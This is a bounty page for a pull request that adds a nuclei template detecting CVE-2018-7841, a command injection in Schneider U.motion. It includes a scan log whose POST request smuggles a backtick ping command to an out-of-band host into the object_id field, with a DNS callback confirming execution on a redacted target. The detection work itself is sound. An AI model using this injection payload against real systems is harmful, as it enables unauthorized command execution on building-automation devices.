PR
Create CVE-2018-7841.yaml
projectdiscovery/nuclei-templates#12967
Template / PR Information
- Add CVE-2018-7841
Template Validation
I’ve validated this template locally?
- YES
- NO
Additional Details (leave it blank if not applicable)
Can provide additional details via Discord if required.
/claim #12851
[INF] Current nuclei version: v3.4.7 (outdated)
[INF] Current nuclei-templates version: v10.2.7 (latest)
[INF] To view results on cloud dashboard, visit https://cloud.projectdiscovery.io/scans upon scan completion.
[INF] New templates added in latest release: 55
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.pro
[INF] [CVE-2018-7841] Dumped HTTP request for https://REDACTED/umotion/modules/reporting/track_import_export.php
POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 104
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
op=export&language=english&interval=1&object_id=`ping -c 1 REDACTED.oast.pro`
[DBG] [CVE-2018-7841] Dumped HTTP response https://REDACTED/umotion/modules/reporting/track_import_export.php
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Origin,SOAPserver,SOAPaction,Method,Accept,DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE
Content-Disposition: attachment; filename="tracking_log_2025_08_24_00_12_38.csv"
Content-Type: application/octet-stream
Date: Sat, 23 Aug 2025 22:12:38 GMT
Server: nginx/1.1.19
X-Powered-By: PHP/5.4.4-4
"ID";"Object";"Period";"Timestamp";"Year";"Month";"Day";"Time";"Week";"Day of the week";"Initial value";"Final value";"Average value";"Min. value";"Max. value";"Sum";"Counter";"Difference";"Integral"
[REDACTED] Received DNS interaction from REDACTED at 2025-08-23 22:12:37
------------
DNS Request
------------
;; opcode: QUERY, status: NOERROR, id: 4217
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;REDACTED.OAst.PrO. IN A
------------
DNS Response
------------
;; opcode: QUERY, status: NOERROR, id: 4217
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;REDACTED.OAst.PrO. IN A
;; ANSWER SECTION:
REDACTED.OAst.PrO. 3600 IN A REDACTED
;; AUTHORITY SECTION:
REDACTED.OAst.PrO. 3600 IN NS ns1.oast.pro.
REDACTED.OAst.PrO. 3600 IN NS ns2.oast.pro.
;; ADDITIONAL SECTION:
ns1.oast.pro. 3600 IN A REDACTED
ns2.oast.pro. 3600 IN A REDACTED
[CVE-2018-7841:status-1] [http] [critical] https://REDACTED/umotion/modules/reporting/track_import_export.php
[CVE-2018-7841:word-2] [http] [critical] https://REDACTED/umotion/modules/reporting/track_import_export.php
[CVE-2018-7841:word-3] [http] [critical] https://REDACTED/umotion/modules/reporting/track_import_export.php
[INF] Scan completed in 7.968413309s. 3 matches found.
Additional References:
Claim
Total prize pool
$50
Total paid
$50
Status
Approved
Submitted
August 23, 2025
Last updated
August 23, 2025
Contributors
CH
Chris
@darses
Sponsors
PR
ProjectDiscovery
@projectdiscovery
$50
paid